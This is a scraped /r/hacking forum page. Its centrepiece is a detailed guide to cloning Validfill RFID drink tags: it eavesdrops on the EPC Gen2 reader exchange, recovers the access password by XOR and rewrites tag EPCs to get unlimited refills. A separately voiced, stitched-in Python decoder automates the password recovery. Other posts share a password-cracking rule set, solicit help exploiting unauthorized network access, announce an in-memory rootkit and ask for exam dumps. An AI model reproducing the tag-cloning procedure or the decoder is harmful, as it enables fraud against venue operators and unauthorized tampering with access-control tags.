/r/hacking
A subreddit dedicated to hacking and hackers.
Constructive collaboration and learning about exploits, industry standards, grey and white hat hacking, new hardware and software hacking technology, sharing ideas and suggestions for small business and personal security.
A subreddit dedicated to hacking and hacking culture.
What we are about: quality and constructive discussion about the culture, profession and love of hacking.
This sub is aimed at those with an understanding of hacking - please visit /r/HowToHack for posting beginner links and tutorials; any beginner questions should be directed there as they will result in a ban here.
Guides and tutorials are welcome here as long as they are suitably complex and most importantly legal!
Bans are handed out at moderator discretion.
Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
Damn kids. They're all alike.
Keep it legal Hacking can be a grey area but keep it above board. Discussion around the legality of issues is ok, encouraging or aiding illegal activities is not
We are not your personal army. This is not the place to try to find hackers to do your dirty work and you will be banned for trying. This includes:
No "how do i start hacking?" posts. See /r/howtohack or the stickied post. Intermediate questions are welcomed - e.g. "How does HSTS prevent SSL stripping?" is a good question. "How do I hack wifi with Kali?" is bad.
No "I got hacked" posts unless it's an interesting post-mortem of a unique attack. Your nan being phished doesn't count.
Sharing of personal data is forbidden - no doxxing or IP dumping
Spam is strictly forbidden and will result in a ban. Professional promotion e.g. from security firms/pen testing companies is allowed within the confines of site-wide rules on self promotion found here, but will otherwise be considered spam.
Off-topic posts will be treated as spam.
Low-effort content will be removed at moderator discretion
We are not tech support, these posts should be kept on /r/techsupport
Don't be a dick. Play nice, support each other and encourage learning.
I heard of this type of protocol and I'm thinking:
Basically the title.
Essentially, someone who didn't have malicious intent but ended up doing more damage than good.
I think it’s safe to say that nobody really likes RFID drink control. Looking online you’ll find countless Reddit posts or articles complaining about how Disney or Universal or their University is using RFID enabled drinkware to limit refills. Many people have speculated on how to defeat it. Some tried using their Flipper but to no avail, some claimed the data was stored off tag, on a server, and some even said it was impossible. In fact, I can find no evidence online that anybody has ever successfully hacked a Validfill tag. Well I’m here to tell you most of those people are wrong. It is possible, but it’s a lot harder than you might think.
Also feel free to ask any questions.
Readings
The second page of the Practical Eavesdropping of control data from EPC Gen2 article, figure 1 and the associated reading provides a great diagram and explanation of the EPC c1g2 protocol.
The official standard for the EPC c1g2 protocol gives very important info on reader and tag signal encoding in sections 6.3.1.2 and 6.3.1.3 as well as command structure which is covered in section 6.3.2.11.3.
Equipment
An EPC c1g2 compliant UHF reader like this PISwords ISO18000 reader from AliExpress. This will allow us to read and write to the tag.
A cheap software defined radio such as the RTL-SDR from Amazon as well as a 902MHz to 927MHz antenna. This will allow us to eavesdrop on tag communication. Also recommended would be a USB extension cable so that you can freely move the radio.
Software
The PISwords reader comes with a demo program that we will use to read and write to the tag. The program is called UHFReader09demomain.exe and can be found at “\Piswordsuhfreadernew\Piswordsuhfreader\USBreaderSoftware\Demo\C#\UHFReader09demomain\bin\x86\Debug”
We will be using Osmocom in conjunction with the RTL-SDR to capture and record reader and tag communication.
We will also be using the Inspectrum tool to analyze the resulting file and convert the FFT graph into an amplitude graph.
Signal decoding can be done visually using a drawing app such as tldraw we’ll use to block out each of the bits.
Gathering Data
The first step in getting quality data is assembling the ideal setup. From testing I found that positioning the SDR’s antenna directly in the middle of the tag’s coil and parallel to the slit. Additionally, testing showed that the tag should be in direct contact with the reader on the Freestyle machine. Testing also showed that the Freestyle machine seems to have a sensor for the bottle itself in addition to the tag, so a bottle should be placed on top of the setup when scanning. You should leave the tag on the reader for at least 20-30 seconds to give you more data to choose from.
Using Osmocom, set the center frequency around 910MHz - 915MHz, testing showed this range was able to receive enough transmissions regardless of frequency hopping. Also, set the sample rate to the max, in my case, 2.55MHz. The higher the sample rate, the greater the bandwidth, and the more likely you are to receive a transmission.
Using Inspectrum, import the file that Osmocom made. Set the zoom slider to min and drag the FFT size slider until it fills most of the screen. Leave the power max slider at max and adjust the power min slider until the background of the display is a dark blue. Start scrolling until you find a bright bar, that’s a transmission.
Right click on the transmission you want and select the derived plot and then add amplitude plot.
Ensure the center of the range is centered on the center of the transmission.
Lower the power max until the amplitude graph shows blocks. You should see blocks throughout the entire transmission and there should be “low” (reader) and “high” (tag) blocks.
The “low” and “high” blocks are also visible from the FFT display making it easier to find quality transmissions.
[Image: Quality transmission, visible from FFT as well]
Using the chart in “Practical Eavesdropping” we can block out each packet in the transmission. The packets we care about are RN16', Access(PIN 31:16 ⊕ RN16'), RN16'', and Access(PIN 15:0 ⊕ RN16'').
The password needed to write to the tags has its 16 most significant bits sent right after the RN16' packet and is encrypted by PIN 31:16 ⊕ RN16' which is a bitwise XOR on the two numbers. The first step should be to record and decode the tag’s response to the Req_RN commands which should provide us with both RN16' and RN16''. Then we should record and decode the reader’s Access commands from which we can extract the encrypted PIN 31:16 ⊕ RN16' and PIN 15:0 ⊕ RN16''. We can then get the original password by performing a bitwise XOR over the encrypted password. This is because the bitwise XOR operator “cancels out” if applied twice.
Analyzing the Tag’s Response
To decode an RN16 packet, start by identifying your packet and setting the zoom slider to max. Adjust the power max slider and the plot range until you can see an alternating signal. The signal should start with symmetric oscillations and then after a while you should see longer peaks or troughs.
Using the information in the official EPC standard, section 6.3.1.3, we can determine that the tag is using Miller-modulated subcarrier with M = 4 and a TRext = 1 preamble. “0”s are encoded by 4 equal high or low pulses while “1”s are encoded by 3 high or low pulses, the center pulse being twice as long.
[Image: Miller-modulated encoding, blocked out preamble]
The rest of the signal can be blocked out in a similar way using the sequence chart as a guide. The Miller protocol also calls for a dummy “1” bit at the end of the packet.
Because the packet we just decoded is an RN16, the previous command should have been Req_RN. We can look this up in section 6.3.2.11.3 to find the data structure of the packet. We see that the tag’s response defines the first 16 bits of the message as the RN16. These bits are important and should be set aside for now.
[Image: Tag reply format, first half of packet]
This process should be done once for RN16' and should be repeated for RN16''.
Analyzing the Reader’s Response
To decode an Access packet, start by identifying your packet and setting the zoom slider to max or a few ticks before max. Adjust the power max slider and the plot range until you can see an alternating signal. The signal should start with one short pulse, one long pulse, and then continue with a combination of short and medium pulses.
Using the information in the official EPC standard, section 6.3.1.2, we can determine that the reader is using Pulse Interval Encoding (PIE) with an R=>T Frame Sync rather than a preamble.
[Image: PIE encoding, Frame Sync and first byte]
The rest of the signal can be blocked out in a similar way using the symbol chart as a guide. Short pulses are “0”s and long pulses are “1”s. The PIE protocol does not end with a dummy bit.
Because the packet we just decoded is an Access packet, we can look this up in section 6.3.2.11.3 to find its data structure. We see that the PIN ⊕ RN16 is defined by the 16 bits after the command. These bits are important and should be set aside for the next step.
[Image: Reader command format, first half of packet]
This process should be done once for PIN 31:16 ⊕ RN16' and should be repeated for PIN 15:0 ⊕ RN16''.
Decoding the Password
To decode PIN 31:16 from PIN 31:16 ⊕ RN16' and RN16', we’ll have to perform a bitwise XOR on the two binary numbers.
In our first analysis, we found that RN16' is “11111011 : 10000010”
In our second analysis, we found that PIN 31:16 ⊕ RN16' is “01100000 : 10101111”
To perform a bitwise XOR, for each bit position in both numbers, we compare the two bits. If they are the same (both “1”s or both “0”s) the resulting bit will be “0”. If they are different (one is “1” and the other “0”) the resulting bit will be “1”.
In this case our resulting PIN 31:16 is “10011011 : 00101101”
We’ll pretend that we calculated PIN 15:0 as “11011010 : 00010011” which means our example password is 10011011001011011101101000010011.
To use this with the reader’s program, we’ll need to convert it to hexadecimal which turns out to be 9B2DDA13.
Reading and Writing to the Tag
Start by opening the PISwords demo program and clicking open port. It may take a few minutes to establish a connection.
Switch to the EPCC1-G2 Test tab and grab a new tag. Click query tag in the upper right corner of the program. Bring the tag near until the reader beeps, you should see the tag’s EPC being written on the list. This string encodes the number of fills on the bottle and should be noted for the next step. Click query tag again and bring the tag that you wish to write to near the reader until it beeps. You should see the tag’s EPC being written on the list. This step sets the target of the reader to the old tag.
Under the Write EPC section on the middle right, paste the EPC from the new tag under the Write EPC field and paste the password we discovered under the Access Password field. While the tag is in range, press the Write EPC button. You should hear a beep and see a message at the bottom of the program saying “Write EPC Successfully”.
The tag will now act identically to the new tag that had been copied from.
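The post's decoding steps, carried through end to end as an added example (this is not the post's own code, nor any vendor's tooling). It assumes reader symbols arrive as a list of symbol lengths in microseconds measured after the frame-sync delimiter (constructed sample waveforms, not real captures), takes RN16' = 0xFB82 and PIN 31:16 ⊕ RN16' = 0x60AF from the post, and uses a constructed RN16'' = 0x3C5A, which the post never gives. The point it makes is the defensive one behind the whole writeup: because the tag backscatters RN16 in the clear, XOR cover-coding hides the access password only from someone who missed the tag reply, so a Gen2 access password is not a confidentiality control and enforcement should not rest on a tag-held secret.

```python
"""EPC Gen2 Access exchange: why a passive listener recovers the access password.

Added example, not code from the post.  Assumptions: reader symbols are given
as symbol lengths in microseconds after the frame-sync delimiter (constructed);
RN16' = 0xFB82 and PIN 31:16 XOR RN16' = 0x60AF come from the post;
RN16'' = 0x3C5A is constructed; PIN 15:0 = 0xDA13 is the post's pretend value.
"""

ACCESS_CMD = "11000110"  # Access command code, EPC Gen2 section 6.3.2.11.3


def pie_decode(symbol_lengths):
    """Decode reader (R=>T) PIE symbols that follow the frame-sync delimiter.

    The first two symbols are the frame sync: data-0 (length Tari) and RTcal
    (= data-0 length + data-1 length).  The standard defines pivot = RTcal / 2;
    symbols shorter than pivot are 0s, longer ones are 1s.  Returns the
    payload bits as a string.
    """
    if len(symbol_lengths) < 2:
        raise ValueError("need at least the data-0 and RTcal symbols")
    tari, rtcal = symbol_lengths[0], symbol_lengths[1]
    if not 2.5 * tari <= rtcal <= 3.0 * tari:
        raise ValueError("RTcal outside the 2.5-3.0 Tari range")
    pivot = rtcal / 2.0
    return "".join("0" if length < pivot else "1" for length in symbol_lengths[2:])


def access_cover_word(bits):
    """Return the cover-coded 16-bit password word carried by an Access command.

    Layout: 8-bit command, 16-bit (password half XOR RN16), 16-bit handle, CRC-16.
    Only the first 24 bits are needed here.
    """
    if len(bits) < 24 or bits[:8] != ACCESS_CMD:
        raise ValueError("not a complete Access command")
    return int(bits[8:24], 2)


def uncover(cover_word, rn16):
    """XOR twice cancels: (pin ^ rn16) ^ rn16 == pin.

    RN16 is backscattered by the tag in the clear, so anyone who captured the
    tag reply as well as the reader command gets the password half back.
    """
    return (cover_word ^ rn16) & 0xFFFF


def symbols_for(bits, tari=25.0):
    """Constructed reader waveform: frame sync followed by PIE data symbols
    (data-1 chosen as 2 Tari, so RTcal = 3 Tari)."""
    return [tari, 3 * tari] + [tari if b == "0" else 2 * tari for b in bits]


# Sample exchange.  RN16' and the first cover-coded word are the post's values;
# RN16'' is constructed, and PIN 15:0 = 0xDA13 is the post's "pretend" value.
RN16_A, COVER_A = 0xFB82, 0x60AF
RN16_B, PIN_LO = 0x3C5A, 0xDA13
COVER_B = PIN_LO ^ RN16_B  # what the reader would transmit in the second Access


def recover_password(captures):
    """captures: list of (rn16_from_tag_reply, reader_symbol_lengths) pairs,
    one per Access command, in order (PIN 31:16 first, then PIN 15:0).
    Returns the 32-bit access password as 8 hex digits."""
    halves = []
    for rn16, symbols in captures:
        cover = access_cover_word(pie_decode(symbols))
        halves.append(uncover(cover, rn16))
    hi, lo = halves
    return f"{(hi << 16) | lo:08X}"


def demo():
    """Run the two captured Access exchanges through the decoder."""
    captures = [
        (RN16_A, symbols_for(ACCESS_CMD + f"{COVER_A:016b}")),
        (RN16_B, symbols_for(ACCESS_CMD + f"{COVER_B:016b}")),
    ]
    return recover_password(captures)


if __name__ == "__main__":
    print(demo())  # 9B2DDA13
```

`pie_decode` uses the pivot rule exactly as a tag would, so it also copes with a reader whose data-1 is 1.5 Tari rather than 2 Tari; the RTcal range check rejects a capture where the frame sync was mis-identified, which is the usual failure when the zoom is set a few ticks too far.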
Or seems like every week a new organization such as Ticketmaster or Johnson Controls gets breached but we don't see Putin's private investment records or Obama's notes from decisions made during his presidency getting released? These are just random examples but to me it seems like there would be sufficient market for this type of info that someone would go after it.
Is there a significant difference in how these individuals' private information is stored compared to major organizations' user data? It seems like both could afford the best security available.
I know some Linux commands from OverTheWire ("ls, cd, cat, file, du, find, grep, sort, uniq, strings, base64") and I wanted to know what Linux projects I can do to expand on this for cyber security apart from OverTheWire.
I am a beginner.
Forgive me if this is a stupid question as I've done minimal research and my background is purely in backend development of micro services, but does anyone have any tips on sniffing traffic from a wearable?
I don't have the ring on me yet so I can't try anything yet. I imagine the ring sends information over Bluetooth, has anyone done anything like this that I can get some resources to read up on?
I think it'd be neat to potentially get the raw data myself and see if I can write a wrapper to export the data to better apps since the ring has minimal third party integrations.
Is pwnable.kr good for an absolute beginner?
I am an absolute noob in linux
I am on Level 6 on Over the Wire and so far I am understanding, but I also heard about pwnable.kr so I tried out the first level on [Toddler's Bottle] (fd) and I am at a loss. I so far understand what a file directory is and how to create and remove one, but I saw that you need to have an understanding of C for pwnable.kr.
Am I wrong?
I am a beginner in python right now and I tried to use the OS module but realized that the code would be linked to my directory and not the pwnable.kr port which I do not know how to switch over.
Hello community, I am doing research on vulnerabilities in PAN networks focused on Bluetooth technology. I would like to know if any of you know sites or places where I can look for updated information on this.
And based on that, perform tests in controlled environments with open source tools. Thanks, greetings.
Ubertooth is a great device and tool to discover the UAP+LAP. For my needs, I must have the entire BD_ADDR correct. The most common way to find the missing part (NAP) is to bruteforce the OUI list with addresses that end with the UAP and try to smartly relate to the type of device. That way you minimize the number of potential addresses to check (averaging around 30-40 addresses).
If I try to establish a connection with a wrong address and it falls (which is good) I can try another, but the device will show a notification (that's bad).
So bruteforcing with connection is not the right way. Ping is better.
My problem is that I don't know how to ping an exact address. All the tools are working even if the NAP is wrong (if the UAP+LAP are correct it's enough). Tools like l2ping, hcitool etc. For example, if my device's address is 01:02:03:04:05:06 I can ping to xx:xx:03:04:05:06 (x can be any value) and the ping will still work.
I want to ping an address and receive an answer only if the entire address is correct.
Does anyone know how I can achieve that? Which tool? Maybe a different way?
Hi, I want to learn about Chinese state hacker groups, attacks they did, possibly with technical details. Can you point me anywhere? Thanks
How do nation-state hackers and APTs get so skilled, stealthy and insidious. What separates them from the rest of the hackers. What makes them the creme de la creme of the game?
Does anyone have a dump from cyberwarfare CRTA?
This is a 2023 remix of the OneRuleToRuleThemAll (2019) hashcat rule.
OneRuleToRuleThemStill now has a ~6.9% reduction in rules (52,000 down to 48,414) with 0% performance loss against the Lifeboat and LastFM data breaches.
Updates:
Happy cracking!
Tons of generic stuff that has no real-world application. A CVE may score 10 star points, yet there's no showcase of exploitation, making it pointless.
MITRE ATT&CK is even worse.
Hello everybody, I’ve been kind of looking for direction in life and computers fascinate me. I don’t really know anything about them but can create a mean power point LOL, all jokes aside, I want to learn how to code or hack or just understand what code even is. What and where can I self learn these things? Sorry for the stupid questions.
Hello all,
I am a PhD researcher and my area of research centers around the role of CISOs and the different factors at play around that role, such as poor work-life balance, burnout, lack of recognition in the board, etc.
I am extremely passionate about my projects and rather than writing research papers just for namesake, I want to talk to CISOs, understand their side of things granularly, and then present my findings in a way that can potentially have real world implications for practitioners and businesses.
Unfortunately, I have learnt the hard way that it is very difficult to engage CISOs to invest an hour of their time with me to interview for my study, owing to many justified reasons such as not having enough time due to their workload. And please don't get me wrong, I respect that.
For the past few months, I have been trying to connect with CISOs on LinkedIn for this pursuit, but haven't gotten enough numbers. It has come to a point that my advisor has hinted that I let go of these projects as the CISO population is a tricky one to engage.
I am not willing to give up just yet. The problems CISOs face are worth solving, and while I am unable to compensate you for your time invested in my projects (especially because of lesser than usual support from the department), I am deeply committed to providing actionable recommendations that can help CISOs manage their burnout and their work better.
If you are a CISO and would be open to investing an hour of your time someday with me, I would be deeply appreciative of your help. I have the IRB approvals as well, meaning that no identifiable detail would be made public.
Thank you.
A few years ago I would use a website that had user-submitted, pre-compiled binaries (I know that sounds sketchy), that had hidden phrases within them. The goal was to find the hidden phrases via decompiling, patching, and other methods, then to submit the answer to the site to show that you completed the challenge. I think the challenges each had difficulty ratings (maybe 1-5 or something?).
I can't remember or find this site for the life of me, and I wouldn't be surprised if it no longer exists. Does anyone else remember? If not, is there some nice alternative? Any info is appreciated.
archive.org is one of the greatest websites in the history of the Internet. Why would somebody want to hack it, especially while pointing out how easy it was?
Do you think there's a deeper reason for that or it's just some kid who noticed how easy it would be and went for it because he's no good for anything else?
I’ve been learning a few new techniques and was wondering if anyone has the same hobby and who love to tinker with Kali Linux, Arduino, ESP32, social engineering, and hacking in general !
I was able to get unique access to an interesting network but don’t want to “burn” my access too fast , please DM me !
Well, it's been a while since I tried my hand at malware. I call this an in-memory rootkit as it doesn't touch disk, hides from netstat, ps, lsof and history. Some might argue it has no persistence if the device is rebooted, but if you've ever been on a server with 2000 days of uptime, it's kind of pointless to do persistence in those cases. Should be self-explanatory from the README file, but I'll be glad to help anyone with questions. Should work on any x86_64 Linux, but I've only tested it on Debian so far. I'd love some feedback if anyone has time.
Okay okay, hear me out. Obviously anything being breached isn’t necessarily a good thing… but considering the breaches haven’t (hopefully) done anything with the data other than hand it over to HIBP, is that such a bad thing?
Just imagine for one moment if an actual awful threat actor breached instead, what would they do with that data? Now Internet Archive can patch whatever vulnerability opened themselves up to this and avoid this case in the future.